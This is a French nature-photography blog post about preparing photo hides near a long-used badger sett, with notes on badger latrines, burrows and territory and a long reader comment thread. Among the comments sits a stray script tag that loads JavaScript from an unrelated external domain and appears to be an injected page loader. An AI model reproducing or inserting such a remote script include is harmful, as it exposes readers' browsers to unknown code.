• Approche et préparation pour un affût - 1/2

     Fin de journée, nous voilà partis pour installer un affût (un grand merci à Ernestine).
    Bien sympa cette ambiance forestière pour accéder à l'endroit propice à d'éventuelles belles rencontres.



    Nous traversons trois champs comme il nous a été indiqué, tout en faisant bien attention de refermer
    les différentes clôtures des pâtures occupées par les chevaux d'Ernestine.

     Bien que les terrains soient privés, les propriétaires des lieux ne sont pas parvenus à interdire l'accès aux chasseurs. 
    Il y a quelques années, Ernestine à eu l'horrible surprise de découvrir qu'un de ses chevaux avait été canardé par des
    chasseurs, laissé très grièvement blessé, ce qui a nécessité son euthanasie.

      
    La traversée est de bonne augure, nous trouvons les premiers indices de présence... 
    Nous découvrons beaucoup d'empreintes en traversant les champs.

     
    Les indices de présence se font plus "présents"... avec des déjections (ici celles de blaireaux).

      

    Concernant les Blaireaux, les crottes sont généralement déposées dans de petits trous non refermés appelés pots.
    On peut trouver aux alentours du terrier (parfois assez loin) des latrines formées de plusieurs de ces pots à crottes.
    Elles sont de consistance variable selon les aliments (boueuses quand le Blaireau à mangé des lombrics).
    Les latrines de gauches sont bien pleines et resteront ainsi à découvert. Celles de droite ont été creusées plus récemment.
    Sur le chemin, nous en voyons quatre assez espacées les unes des autres et au beau milieu des champs, très à découvert. 

    Approche et préparation pour un affût

     Nous voilà arrivés sur le lieu ou depuis 30 ans, des couples de Blaireaux ont investi les lieux, probablement de
    génération en génération, car leur espérance de vie est de 14 ans maximum. Nous prenons toutes les précautions pour
    ne pas les déranger et surtout ne pas nous approcher trop près des endroits très fréquentés. 

    Ici, un endroit manifestement très emprunté au milieu des fougères.
    Le terrier est composé de 3 à 10 entrées (parfois beaucoup plus) distantes de 10 à 20 m (exceptionnellement
    jusqu'à 100 m). Il comporte des galeries et des chambres garnies de feuilles et d’herbes. Les déblais sont rejetés à
    l’extérieur et renferment des restes de vieille litière (herbes, fougères) et il arrive même d'y trouver des os de
    blaireaux morts dans le terrier. Les empreintes sont souvent très nettes à la sortie des terriers occupés.
    Le toboggan est caractéristique à la sortie des gueules (en évacuant l'ancienne litière à reculons, le blaireau
    fabrique un toboggan avec les déblais) - (photo ci-dessus). 

     Nous trouvons un endroit pour installer les tentes affûts et par chance, nous sommes à bon vent. Nous
    espérons que ce sera toujours le cas à notre retour... Martine a un léger souci pour enfoncer les sardines
    histoire que les tentes ne s'envolent pas : "Un gros caillou, je veux un gros caillou !". 

    Approche et préparation pour un affût - 1/2

    Les affûts sont à présent installés. 
    Faute de beaucoup de possibilités pour s'installer, nous avons collé les deux affûts l'un à l'autre.
    Habituellement, partir en affût est plutôt solitaire, maximum deux, car forcément, plus on est nombreux
    et moins on a de chance d'avoir de belles visites. La tenue de camouflage 3D est aussi une bonne méthode
    qui ne nécessite pas d'installation préalable, et permet de s'installer n'importe où.

    Approche et préparation pour un affût

    Le territoire du Blaireau couvre 30 à 50 ha dans les milieux riches et 150 ha et plus ailleurs.
    La densité est en moyenne de 2 à 20 adultes au 100 ha, mais en France (excepté en Bretagne) la densité de
    population ne dépasse que rarement 1,5 individu au 100 ha. Là où la densité est forte et le milieu stable, la
    dispersion est la plus faible. Les mâles se déplacent plus que les femelles et les sujets qui ont atteint la maturité
    sexuelle (plus de 2 ans) se dispersent davantage. Les émigrants peuvent se joindre à un groupe ou aller plus loin.
    La distance parcourue ne varie pas selon le sexe. A la fin de l’hiver, les mâles font des excursions temporaires
    sur plus d’un kilomètre, sans doute pour s’accoupler dans les territoires voisins.

    l'abondance maximale des Blaireaux est est atteinte dans la campagne cultivée où champs et prairies alternent
    avec des bois (ce qui était le cas ici). On le trouve surtout dans les bois de feuillus avec des clairières en proximité.

    Les galeries du terrier ont généralement 10 à 20 m de long. Les pièces fréquentées pour dormir sont garnies de
    matériaux plus ou moins variés que le Blaireau maintient contre son menton avec ses pattes antérieures et qu’il
    apporte à reculons. Les galeries mesurent au moins 20 cm de diamètre, les entrées souvent davantage et devant ces
    dernières, il y a un amas de déblais. Certains terriers sont occupés et agrandis par des générations successives
    pendant des décennies (c'est donc le cas ici) voire des siècles. Il peut y avoir plusieurs petits terriers dispersés dans le
    territoire en plus du terrier principal et qui servent souvent de terriers refuges. Le terrier se trouve dans les bois, les
    broussailles, les haies, les carrières, les falaises maritimes, les landes, les champs, les talus, sous des bâtiments ou dans
    des cavités naturelles.

    Approche et préparation pour un affût

     Notre installation est à présent terminée. Nous laissons les affûts pendant quelques jours sans y revenir de manière
    à ce que les animaux s'habituent à leur présence et ne s'en inquiètent plus.  Nous  espérons que les chasseurs ne
    vont pas repérer les deux affûts et donc... les terriers, et aussi, que nous allons les retrouver à notre retour...
    Pendant notre séjour dans le Massif central, et malgré la faible population humaine au Km², nous avons trouvé
    plusieurs Blaireaux tapés par les voitures et gisant sur le bord des routes...;-(

     

    « Héron cendré très affairé...Et tout le monde s'en fout #1 - Les femmes - »

  • Commentaires

    1
    Lundi 14 Octobre à 05:56
    CathyRose

    Ah tu étais dans le Massif Central !
    Déjà les paysages du début sont superbes, les couleurs de la deuxième photo sont très belles.
    Bon alors hâte de voir si vous avez pu observer ces blaireaux, j'espère que oui !
    En tous cas je découvre tout ce qui concerne l'affût.
    Belle semaine, bisous !
    Cathy

      • Lundi 14 Octobre à 14:44

        Coucou Cathy,
        Oui, courant septembre, et nous avons eu la chance d'avoir un très beau temps durant tout notre séjour.
        La suite au prochain épisode ;-)
        Bisous et bonne journée

    2
    Lundi 14 Octobre à 05:59

    Merci pour cet article très intéressant, je ne savais pas qu'il fallait installer un affût plusieurs jours avant de s'en servir.

    Les blaireaux semblent être très organisés dans les terriers , je n'en reviens pas de la longueur d'un terrier, une ville sous terre!

    Très belle journée, bises

    danièle

      • Lundi 14 Octobre à 10:22

        Quand c'est possible, c'est préférable, là notre location n'était pas très très loin.
        Bises et bonne journée Danièle

    3
    Lundi 14 Octobre à 06:58

    Coucou Pascale, 
    Ah oui, c'était une sacrée expédition ce jour là !
    Bon, je ne m'attendais pas à voir ma tronche sur les photos, tu devais bien avoir d'autres choses à montrer ;-(
    Oui, le caillou a été d'une grande utilité mais derrière quelle galère à la fin pour retirer les sardines !
    On a découvert les petits trous où les blaireaux déposent leurs crottes, c'était irréel. 
    Creuser pour rassembler leurs déjections, c'est une chose que je connaissait absolument pas, chez aucun animal, c'est très particulier. 
    C'était un bon moment passé ensemble et de beaux souvenirs.
    Un grand merci à Ernestine qui est une formidable personne.
    Très jolie série malgré.....
    Grosssssssss bisousssssssss et bonne journée

      • Lundi 14 Octobre à 10:27

        Coucou Martine,
        Roooooo ta "tronche" comme tu dis.... mais je défie bien qui que ce soit d'être capable de te reconnaître sur ces photos ou tu es de dos ou cachée par tes cheveux, franchement, on ne voit pas tes traits, pas plus que Laurent d'ailleurs. 
        Pour les sardines, il y en a d'ailleurs une qui n'a jamais voulu quitter les lieux, pourtant, on a bien tiré dessus. Incroyable !
        C'est vrai qu'Ernestine était vraiment gentille et elle a fait le maximum pour nous apporter des renseignements. De plus, la maison entièrement écologique était super et bien située en pleine nature.
        BigBisousssssssss et bonne journée


    4
    Lundi 14 Octobre à 07:42

    Bravo pour tes magnifique photos  de cette balade.. Bonne journée

    5
    Lundi 14 Octobre à 07:49

    oh un bel article fort enrichissant, j'avoue que tu me ravis avec tes explications, j'espère que vous aurez eu l'occasion de faire de belles photos par la suite. bises.celine

    6
    Lundi 14 Octobre à 07:50
    Passtelle

    Bonjour Pascale, merci pour ce reportage très intéressant. Je ne saurais pas reconnaître un blaireau même s'il se posait devant moi, mais dorénavant grâce à toi je saurai reconnaître son terrier avec le toboggan ! 

    J'attends la suite avec impatience ! Merci.  :)

    7
    Lundi 14 Octobre à 08:12
    Une installation vraiment intéressante...j'ai eu la chance de trouver plusieurs fois des terriers de blaireau encore occupé dont une fois envahie de puces ce qui était moins drôle...mais je n'ai jamais vu leur pot...il faut dire que je ne les ai pas cherché...merci pour toutes tes explications c'est passionnant de te suivre et tu nous fais languir de voir les blaireaux. Bisous
    8
    Lundi 14 Octobre à 08:20

    How fascinating, Pascale, to see how carefully you have staked everything out, waiting for the badgers to come!

    9
    Lundi 14 Octobre à 08:34

    Bonjour Pascale. J'ai beaucoup apprécié tes explications et photos sur la mise en place de ces affûts. Je suppose que vos efforts et votre patience ont été bien récompensés. Bonne journée et bisous

    10
    Lundi 14 Octobre à 08:52
    PascalXLD

    Une superbe invitation à la rando ce paysage

     

    Bonne journée

      • Lundi 14 Octobre à 10:29

        Là, on y était pas vraiment pour la rando je dois dire. Cepandant, l'environnement était très agréable.
        Bonne journée

    11
    Lundi 14 Octobre à 09:09

    quelle installation! merci je ne savais pas tout ça sur les blaireaux! jamais eu la chance d'en voir un,à part écrasé sur la route... gros bisous Pascale. cathy

    12
    Lundi 14 Octobre à 09:24

    Un excellent reportage, avec beaucoup de pittoresque ; les tentes bien intégrées au paysage : attendons la suite !

    13
    Lundi 14 Octobre à 10:08

    Merci pour cette excellente explication sur l'installation d'affûts! Il faut être bien patient pour ce genre de photos, mais le résultat doit être très enrichissant! J'ai pris beaucoup de plaisir à suivre le déroulement, très belle journée Pascale! 

      • Lundi 14 Octobre à 14:47

        En effet, il faut de la patience, et surtout ne jamais se décourager. En fait, c'est ce qui donne tout le plaisir à l'affût, c'est que jamais rien n'est gagné à l'avance ;-)
        Ravie que tu ais apprécié.
        Bonne journée

    14
    Lundi 14 Octobre à 10:10
    Septsup

    très intéressant cet article... c est chouette de savoir comment vous faites... mais une question me brûle les lèvres... la couleur des tentes... j aurais tout imaginé sauf ce bleu voyant... tu me diras... bisous

      • Lundi 14 Octobre à 10:35

        Coucou Chris,
        En réalité, ce n'est pas bleu mais un fond vert kaki. L'une des deux a un camouflage de roseaux (la mienne car je suis souvent autour des étangs) et l'autre feuilles de chênes.
        Ici, elles sont placées dans un endroit qui est assez dégagé et les herbes sont très grillées par la chaleur, donc elles se voient bien, mais normalement, elles se fondent bien dans la nature.
        Bisous et bonne journée

    15
    Lundi 14 Octobre à 10:44

    bonjour Pascal , merci de ce beau partage et préparation pour l’affût !  oui ça doit être intéressant de le faire au moins 1 fois ... !  merci pour les infos sur ces blaireaux ! et belles photos nature  et  +++ , et pour les chevaux ? mais ces chasseurs ils sont fous ! " ils tueraient leur mère" comme on dit par chez nous  ????

    gros bisous belle journée  A+

      • Lundi 14 Octobre à 10:53

        Coucou Bébert,
        Oui, c'est intéressant, et il y a plusieurs manières de pratiquer l'affût, selon l'endroit et selon ce que l'on souhaite faire. La combinaison 3D étant la moins contraignante ne serait-ce que pour le transport.
        Pour les chasseurs, tout est dit... et bien que la grande majorité de la population française demandent soit l'arrêt de la chasse, soit un encadrement bien plus stricte, le gouvernement continue de les soutenir et continue de tolérer tous ces accidents mortels... C'est un lobby extrêmement puissant, tout le monde le sait, et une quantité importante de bulletins de vote ;-(
        Bisous et bonne journée.

    16
    Lundi 14 Octobre à 10:51
    A cool and interesting reportage series, nice those shelters.
    17
    Lundi 14 Octobre à 11:00

    Bonjour,

    Ton article est passionnant et j'espère qu'il aura une suite !

    Mon attention avait été attirée sur  les blaireaux lorsque j'ai acheté ma première petite chienne teckel Son propriétaire vendait toute la portée parce que la mère s'était montée trop peu combative à la chasse , contrairement à la prestigieuse lignée dont elle était issue .C'est là que j'ai appris l'horreur absolue de la chasse aux blaireaux pratiquée avec des teckels (pour le blaireau et pour le chien !).

    Ma chienne n'a évidemment jamais chassé mais elle devenait hystérique devant  le moindre terrier ...

    Bises .

      • Lundi 14 Octobre à 11:33

        Coucou Sophie,
        Pour moi, la chasse, et quelque soit le manière de la pratiquer est une horreur. Ta chienne est très intelligente alors ;-)
        Bises et bonne journée

    18
    Lundi 14 Octobre à 11:30

    Coucou Pascale, de magnifiques prises de vue afin de nous présenter l'endroit de "votre expédition".  Super les deux affûts des couleurs qui se fondent bien dans le paysage. J'en ai appris beaucoup sur les terriers des blaireaux, c'est très intéressant. Quant aux chasseurs je passe car je dirais des choses peu agréables!  Maintenant que tout est prêt j'attends de voir les blaireaux avec impatience.  En Haute Savoie il y en avait de nombreux écrasés sur le bord des routes sniff sniff...

    Belle et douce journée et plein de gros bisous

    chatou

    19
    Lundi 14 Octobre à 11:51

    Ton article est bien enrichissant Pascale, moi qui n'ai jamais fait de clichés de ce genre, un vrai plaisir de te lire ..Beaucoup de patience, de techniques et le bonheur de découvertes au bout .Merci pour ce super partage ...

    Passe une bonne journée surtout,

    Bises de Christiane

    20
    Lundi 14 Octobre à 11:58

    Bonjour Pascale

    Il y a toute une préparation avant de mettre l'animal dans la boite . Merci pour toutes ces explications sur le blaireau et son habitat,j'ai eu l'occasion d'en voir une fois. bonne semaine  amitiés 

    21
    Lundi 14 Octobre à 12:24

    Bonjour,

    une expédition très intéressante, c'est vrai que les animaux mettent quelques jours à "apprivoiser" un nouvel élément dans leur cadre de vie.

    22
    Lundi 14 Octobre à 13:46

    What a great expedition you've taken us on with a wealth of information on badgers and their dung. A beautiful pasture overlook photo you've captured! Looked like a cool autumn excursion. How terrible that the hunters shot one of the horses. 

    23
    Lundi 14 Octobre à 14:39

    INviting pathway. Beautiful landscapes. Prepared for the weather with the tents.  I do not like hunters of any kind. I hope you find the badgers to photo.  Friendship 

    24
    Lundi 14 Octobre à 15:41
    Denise

    Bonjour Pascale, j'apprécie ton billet très enrichissant sur les blaireaux. Tu (vous quatre) prends beaucoup de soin pour l'installation et pour le respect de la nature. J'espère que tu pourras en photographier. Beau billet et superbes photos.

    Bisous et bel après-midi

      • Lundi 14 Octobre à 16:07

        Coucou Denise,
        En réalité, nous étions trois pour l'installation des affûts, le quatrième protagoniste ne nous a pas accompagné pour cause de toux. 
        Oui, c'est important pour moi de déranger le moins qu'il m'est possible et surtout de ne jamais laisser de traces polluante de mon passage. D'où le fait que nous ayons été très ennuyés de ne pas parvenir à retirer une de nos sardines permettant de maintenir les tentes en place, mais tous nos efforts ont été vains ;-(
        Bisous et bonne fin de journée

    25
    Lundi 14 Octobre à 15:42

    Passionnante expédition !!

    Bisous Pascale

    26
    Lundi 14 Octobre à 16:20
    jeanmadis

    Un régal cette présentation à ne future chasse aux belles images. J'ignorai totalement ce genre de stratégies, tu nous dévoiles un aspect très intéressant de cette recherche  images authentiques.

    Je te souhaite de belles rencontres à venir, je suis sur que la suite va donner d'excellents résultats.

    A bientôt pour l'épisode suivant.

    27
    Lundi 14 Octobre à 16:20
    DANIEL

    Que de beaux paysages !! et une belle leçon sur les affûts et les blaireaux!! ON sent que tu aimes la nature et les animaux. Je pense qu'il y aura une suite ?

    28
    Lundi 14 Octobre à 16:23

    Bonjour Pascale , ton reportage est vraiment passionnant. Et alors , fructueuse moisson de photos???? 

    La chasse est une perversion car ils savent très bien ce qu'ils font . Ce sont des tueurs point barre et tout le reste n'est que prétexte à zigouiller ou clientélisme électoral à cultiver! Amitiés Pascale!

      • Lundi 14 Octobre à 16:33

        Coucou Zoé,
        Ce sera pour une autre fois, il faudra patienter pour savoir ;-)
        Pour la chasse, je partage parfaitement cet opinion, tu le sais.
        Bonne journée

    29
    Lundi 14 Octobre à 17:12

    bsr Pascale, merci pour cet article intéressant et photos. Bonne soirée

    30
    Lundi 14 Octobre à 17:23

    Tes photos sont belles et ton article très intéressant. J'attends de voir la suite...

    Bonne soirée Pascale

    31
    Lundi 14 Octobre à 17:31

    Coucou Pascale,

    Merci pour ce bel article qui permet de voir comment tu fais pour prendre d'aussi jolies photos. Pour certaines, il faut de l'équipement, du temps et surtout de la patience. Je vois que les blaireaux, je ne le savais pas.

    Gros bisous et bonne fin de journée

    32
    Lundi 14 Octobre à 17:52

    La semaine dernière, un cheval a été tué dans une propriété par de chasseurs : "la balle avait ricoché "!!!

    Bises

      • Lundi 14 Octobre à 17:55

        Oui, j'ai lu cette information qui est loin d'être exceptionnelle malheureusement.
        Et sinon, pour mon article sur la préparation d'un affût ????
        Bonne fin de journée

    33
    Lundi 14 Octobre à 17:53

    Bonjour Pascale..

    Ton billet est très instructif sur la préparation de affût, les traces et la vie de cet animal...

    Douce soirée Pascale bise.

    34
    Lundi 14 Octobre à 18:06

    Ah ah. J'ai pour habitude de traiter mon chef de ... blaireau. Je sais, ce n'est pas très sympa pour les vrais blaireaux. :-))

    Je croise parfois un blaireau le matin que je prends la voiture tôt pour aller au travail, il ne se presse jamais pour traverser la route et j'ai toujours peur de lui faire du mal si je ne le vois pas. Mais pour l'instant, nous arrivons à cohabiter sans problème. Je vois que la photographie animalière nécessite beaucoup de préparation. Je n'en ai jamais faite (je n'aurai pas la patience et pas le matériel) donc j'admire les efforts pour toute l'installation. Et je me réjouis de croiser le fameux blaireau! Bises alpines.

      • Lundi 14 Octobre à 18:12

        Ah oui, ce n'est pas gentil pour... les vrais Blaireaux ça.
        Il y a des expression comme celle-là que j'ai banni de mon vocabulaire. Comme "bête" ou "bêtise", parce que... pas si bêtes ces animaux ;-).
        Un peu de patience oui, mais quand elle est récompensée, quel bonheur !
        Bises et bonne soirée Dédé

    35
    Lundi 14 Octobre à 18:36

    bonjour Pascale

    un article tres interressant que tu nous proposes,avec des détails sur ces blaireaux que j'avoue je ne connaissais pas du tout...

    donc suite au prochain numero, on attend le résultat de vos investigations..

    bises

    bonne soirée

    36
    Philippe Debiève
    Lundi 14 Octobre à 19:18

    Un article qui laisse espérer que... je n'ai jamais fait d'affût Pascale donc je suis admiratif des préparatifs et des précautions que vous avez prises pour les futures captures. L'endroit choisi est de toute beauté, j'aime cette zone boisée et les pierres avec mousses. Allez je vais revenir, ma curiosité m'y force smile bonne soirée à vous deux, bises.

    37
    Lundi 14 Octobre à 20:29
    Durgalola

    quel beau paysage !  merci de nous montrer la préparation de l'affût et merci pour tes photos. Vous résidiez dans un bien joli endroit. Bises

    38
    Lundi 14 Octobre à 20:32

    Bonsoir Pascale

    J'admire la beauté de tes photos, cette lumière particulière et ces couleurs magnifiques.

    Bravo pour ta patience, je suis ravie de voir comment tu fais pour prendre de si belles photos et ainsi nous enchanter de ces magnifiques scènes naturelles et de nous offrir des photos de tant de beaux animaux.

    Je suis désolée pour ton amie qui a perdu l'un de ses chevaux qui en plus a dû souffrir... Et dire que les chasseurs osent prétendre qu'ils ne tirent que s'ils ont bien identifié leur proie... Je me souviens encore avec horreur d'avoir vu une horde de chasseurs, qui marchaient vers un endroit où ils allaient chasser, ils étaient déterminés, et leurs visages étaient horribles à voir, on voyait qu'ils jouissaient à l'avance des meurtres qu'ils allaient commettre... 

    Bisous

    Am

    39
    Mo
    Lundi 14 Octobre à 20:34
    Mo

    Bonsoir Pascale,

    Je suis particulièrement choquée par  ce cheval grièvement blessé par des chasseurs! Comment peut-on... Je ne trouve pas mes mots.

    Cette pose d'affûts est bien du travail mais fructueux sans doute.

    Gros bisous,

    Mo

    40
    Lundi 14 Octobre à 21:29
    Coucou Pascale.
    Ah superbe cette mise en bouche ! En tout cas tu m'as intriguée dès le début.
    Par endroit, ici aussi je vois plus les blaireaux au bord de la route que dans leur habitat. Dans l'environnement photographié ils doivent être bien malgré les accidents de la route.
    Bon j'ai des tas de questions mais je vais attendre la suite ;-)
    Pour les chasseurs, il suffit de se mettre en réserve de chasse et de faune sauvage et le tour est joué.
    Gros bisous et bonne soirée :-)
      • Mardi 15 Octobre à 08:58

        Coucou Nath,
        Par ici aussi, je les vois plus souvent... sur le bord des routes ;-(
        Quand j'habitais le fin fond des Cévennes, j'en rencontrais régulièrement car il y avait un terrier non loin de notre auberge, mais à cette époque, je ne faisais pas encore de photos animalières. Je me contentais de les admirer.
        Pour la réserves de chasse, oui, je sais, je l'ai dit à Ernestine, mais il y a certaines conditions à remplir, et il y avait une raison pour elle, mais je ne me souviens plus laquelle...
        Gros bisous et bonne journée

    41
    Tashi
    Lundi 14 Octobre à 22:34

    Bonsoir Pascale, splendide article, vraiment passionnants ces moments que vous avez pu  vivre là bas... cecit dit, les blaireaux je ne  connais vraiment pas, on attend donc la suite, merci bcp du partage!bonne soirée

     

    42
    Elaine Hancock
    Mardi 15 Octobre à 01:36

    This is so interesting! I never knew much about badgers. The landscape is lovely. Having the horse being wounded was very sad. 

    43
    Mardi 15 Octobre à 06:01

    sympa cette vidéo, c'est plein d'humour, mai cela fait passer un beau message; merci pour cette découverte. ces expositions dans la ville sont vraiment superbes, le thème change toutes les fois et c'est toujours surprenant. les enfants des écoles la visitent aussi et travaillent sur les différents sujets, une belle idée de mettre la culture à la portée de tous; pour certains cela permet de découvrir des petits coins cachés de la ville également. bises.celine

    44
    Mardi 15 Octobre à 07:03

    Bonjour Pascale,

    Vous avez posé vos affûts dans un magnifique décors. Quelles images.  Je connais mal le blaireau. Mis à part sa propreté d'avoir des "toilettes".

    Un billet très intéressant et je vais attendre la suite avec une grande curiosité.

    Bises

    45
    Mardi 15 Octobre à 07:11

    Coucou Pascale, 
    Juste pour te dire que je trouve dommage les commentaires fermés sur ta vidéo. 
    Grossssssss bisousssssssss et bonne journée.....Je file, il tombe des cordes, la route va être pénible !

      • Mardi 15 Octobre à 09:11

        Coucou Martine,
        Je me suis interrogée un petit moment sur le fait de laisser ou non les commentaires.
        Mais, au départ, cet endroit est un espace de partage photographique et déjà... parfois je me demande...
        Et puis je me suis trouvée d'autres raisons, comme par exemple mon choix de ne plus déposer mes photos que trois jours dans la semaine dans la mesure ou cela peut devenir très chronophage. Là, qui veut passe, visionne, réfléchit... mais aucune "obligation" pour personne.
        Cela dit, pour ceux qui ont vraiment quelque chose à en dire, il y a toujours moyen de faire comme tu l'as fait ce matin ;-)
        Orage aussi cette nuit, la foudre est tombée et m'a réveillée en sursaut, j'ai cru que c'était une explosion tellement c'était violent. Mais il a plu deux heures et ce matin, la moquette grise est de retour.
        Soyez prudents sur la route et... je croise les doigts ;-)
        BigBisousssssss

    46
    Mardi 15 Octobre à 08:40

    bonjour Pascale

    de belles photos de paysages pour cette installation à la découverte du blaireau , il faut cependant beaucoup de temps pour l'affût ensuite et de la patience .je salive déjà en attendant la suite .

    j'ai regardé ton dernier article sur les femmes ...j'espère que les hommes vont y réfléchir .je vais aller voir les autres aussi .

      • Mardi 15 Octobre à 09:19

        Coucou Ghislaine,
        Tous les affûts ne demandent pas de telles préparations, heureusement. La plupart du temps, le tout est d'essayer d'installer la tente très tôt, et la combinaison 3D est une excellente alternative moins contraignante aussi.
        Là, nous n'étions pas très loin de l'habitat du Blaireau, le terrain était privé et nous pouvions laisser les tentes à l'abri des regards (enfin normalement), et nous voulions mettre toutes les chances de notre côté.
        Chez moi, je ne laisse pas ma tente ainsi, faute de quoi elle aurait disparu bien rapidement avec les chasseurs qui nous détestent nous photographes animaliers.
        Pour la vidéo, je vais en déposer au fil du temps, c'est excellent et plein d'humour sur des sujets très intéressants et bien documentés.
        Bonne journée

    47
    Mardi 15 Octobre à 10:08

    Encore un très intéressant article où j'ai appris pleins de choses sur la vie de cet animal qui peuplent nos bois et forêts. Le coin est vraiment très beau et espérons effectivement que les chasseurs ne verront pas vos affûts. C'est quand même honteux d'avoir tué un cheval et de l'avoir abandonné. On leur donne le droit de passage et... C'est vraiment horrible!!! Je t'embrasse, ma chère Pascale et te souhaite une belle semaine.

    48
    Mardi 15 Octobre à 10:20

    Très intéressant ton article et terribles vos tentes affûts !!! De belles photos des préparations !! J'ai bcp aimé ta vidéo et que c'est vrai tout ça !!! Bien triste !! Bisousssssss

      • Mardi 15 Octobre à 10:43

        Merci pour l'article et pour la vidéo, que du véridique dans une société patriarcale. 
        On a tout de même échappé au pire ;-)
        Bisous et bonne journée Martine

    49
    Mardi 15 Octobre à 10:22

    re.....

    Ah !! c'est beau d'être jeunes et de pouvoir encore faire du scoutisme !!!

    euh !!! qui laisse trainer son matos dans l'herbe comme ça ??? lol !!!

    AA+, bises, maurice

     

      • Mardi 15 Octobre à 10:41

        Re coucou Maurice,
        Nos appareils sont tous protégés boîtiers et objectifs par des housses ad-hoc. Eh puis, même quand on a des tabourets pliants, au moins par terre, pas de risque de chute ;-)
        Bises et à bientôt

    50
    Mardi 15 Octobre à 12:35

    Bonjour Pascale,

    Voilà le genre d'expédition que j'aimerais faire ... Que tes photos sont belles, j'ai hâte de voir la suite.

    Bonne journée, bises, Véronique

    51
    Mardi 15 Octobre à 12:54
    Maguy

    Coucou Pascale , un article très intéressant ,  j'étais bien loin de penser qu'il fallait autant de préparatifs pour un affût ici rien n'est laissé au hasard enfin presque car faut-il encore que les blaireaux soient au RDV et que les chasseurs ne vous ont pas repérer . J'attends avec impatience la suite yes

    Petite question sur la couleur de vos tentes , je pensais que pour se fondre dans la nature le kaki était plus approprié mais tu as sans doute une réponse à mon interrogation sarcastic

    Ps: je viens de voir ta vidéo et je trouve ça dommage que tu ais fermé les commentaires mais merci pour ce partage si ça pouvait faire changer les mentalités mais je ne suis pas très optimiste quand je regarde autour de moi .

    Très beau mardi à toi Pascale et hâte de voir tes photos de blaireaux 

    Bises bien humides de Bretagne  

      • Mardi 15 Octobre à 13:03

        Coucou Maguy,
        Comme je le disais plus haut, un affût ne demande pas toujours une telle préparation, et il y a plusieurs méthodes (combi 3D, filets....). Ici, nous étions quasi sur place et nous avions le temps et la possibilité de faire l'installation à l'avance. Ce n'est pas toujours possible.
        Le fond de ces tentes est bien kaki, avec un camouflage feuilles de chênes pour l'une et roseaux pour l'autre. Ici, l'environnement très sec et roux est trompeur et accentue la couleur des toiles des tentes. Elles se fondent déjà mieux ans l'environnement sur la dernière photo, et en général on essaie de les coller à des buissons. Là ce n'était pas possible pour avoir la vision sur le "tobogan".
        Après, nous ne voyons pas tous forcément les mêmes nuances (voir ICI). Laurent voit du blanc et rose et moi du turquoise et gris. Notre cerveaux est parfois très surprenant ;-)
        Pour ce qui est des commentaires sur les vidéos que je vais déposer au fil du temps, j'ai répondu à flodarom. L'essentiel est qu'elles fassent réfléchir ;-)
        Bises et bonne journée.



    52
    Mardi 15 Octobre à 13:26

    Bonjour Pascale,

    C'est une "belle expédition" et un super partage avec ton amie.

    Je ne savais pas qu'il fallait installer les affûts quelques jours auparavant. Mais c'est bien logique.

    Déjà tes paysages sont magnifiques et les couleurs y sont superbes.

    Merci pour tes explications.... vite on attend la suite !

    Une belle journée à toi malgré la pluie (pas trop de dégâts j'espère)

      • Mardi 15 Octobre à 13:59

        Coucou Elisa,
        C'est mieux (surtout pour les mammifères), mais pas forcément nécessaire non plus ;-)
        Merci pour les photos, c'est gentil.
        Un bel orage cette nuit, mais pas suffisant pour que la terre ait moins soif et aucun dégât, merci. Ici, à part la grêle, étant sur les hauteurs de la ville, on ne subit pas les inondations.
        Bonne journée à toi également.

    53
    Mardi 15 Octobre à 15:46
    harmonybis

    Coucou Pascale,

    j'ai admiré les superbes paysages que vous avez traversés avant de choisir l'endroit pour monter les affûts.Vous êtes de sacrés pisteurs pour trouver l'emplacement idéal.C'est un fameux boulot pour tout installer mais à trois,c'est mieux,la motivation est plus grande.J'ai moi aussi,cru qu'ils étaient de couleur bleue,je me suis donc plantée.Il n'y a plus qu'à attendre de voir les superbes photos que tu auras prises.Il faut énormément de patience pour voir se pointer les animaux et les prendre en photo,je te tire mon chapeau à ce sujet.

    Bon après-midi.Bises.

      • Mardi 15 Octobre à 15:53

        Coucou Harmony,
        Merci, c'est gentil.
        L'installation est rapide, ce sont des affûts qui se déplient tout seul. C'est porter le matériel qui peut parfois être un peu difficile entre les tentes, les pliants, le matériel photo, de quoi boire, et parfois aussi manger selon le temps qu'on veut y passer...
        La voilà ICI, avec sa couleur normale dans ombre.
        Bises et bonne fin de journée

    54
    Mardi 15 Octobre à 18:06

    Qu'il est beau ce paysage qui évoque la moyenne montagne. L'endroit est superbe pour installer des affuts. C'est comme un parcours initiatique à la pratique de la photo à l'affut en imaginant la somme de patience qu'il faut déployer pour capter des instants nature. Le plus beau est donc à venir

    55
    Mardi 15 Octobre à 19:16

    Bonjour,

    et dire que demain mercredi est un jour où la chasse est ouverte...

      • Mardi 15 Octobre à 19:43

        Comme tous les jours ou les enfants ne vont pas à l'école, mais les chasseurs argumentent sur le fait qu'il faut bien que les leurs d'enfants puissent y aller chasser !!!!!!
        Bonne soirée

    56
    Mardi 15 Octobre à 20:26

    Bonsoir Pascale,

    Ton reportage me mets l'eau à la bouche, avec cette approche, tous ces préparatifs et tous les renseignements sur la vie des blaireaux. J'ai hâte de voir le résultat ! Tes images de "toilettes" de blaireau m'ont rappelé une anecdote amusante. Par chez nous dans l'Aisne il y a de nombreuses carrières de calcaire, abandonnées. Mon mari était parti en explorer une avec un ami, quand ils sont tombés sur une salle remplie de trous garnis de crottes. Au début ils ont pensés à l'œuvre d'un déséquilibré comme ils disent dans la presse, puis après quelques recherches on s'est rendu compte que c'était les cabinets des blaireaux !

    Bises.

    57
    Mardi 15 Octobre à 20:58

    Beautiful shots of the countryside and preparations for the photo shoot.

    58
    Mardi 15 Octobre à 21:49

    Salut Pascale,

    Qu'est-ce qu'il ne faut pas faire !

    J'attends donc voir si le jeu en valait la chandelle,  et donc ces fameux blaireaux.

    Bonne soirée,

    Bises.

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    59
    Mercredi 16 Octobre à 18:18

    Bonjour Pascale.

    Que de préparation et de précautions. Cela s'apparente à une véritable expédition scientist. J'espère que  a chasse  photographique sera bonne... Je verrai cela plus tard.

     Bises

    60
    Jeudi 17 Octobre à 10:50

    C'est beauuu... c'est pas une rando mais tu nous donnes de si belles couleurs...Merci!

      • Jeudi 17 Octobre à 10:57

        La belle balade disons, c'était à l'aller et au retour, il y avait un bon petit bout de chemin, très agréable d'ailleurs.
        Merci à toi.

    61
    Jeudi 17 Octobre à 11:10

    bonjour

    maintenant je comprends le pourquoi de la qualité des photos des flamants, le matériel, la patience mais une grande part de savoir faire..bravo

    bonne journée

    62
    Samedi 19 Octobre à 18:03

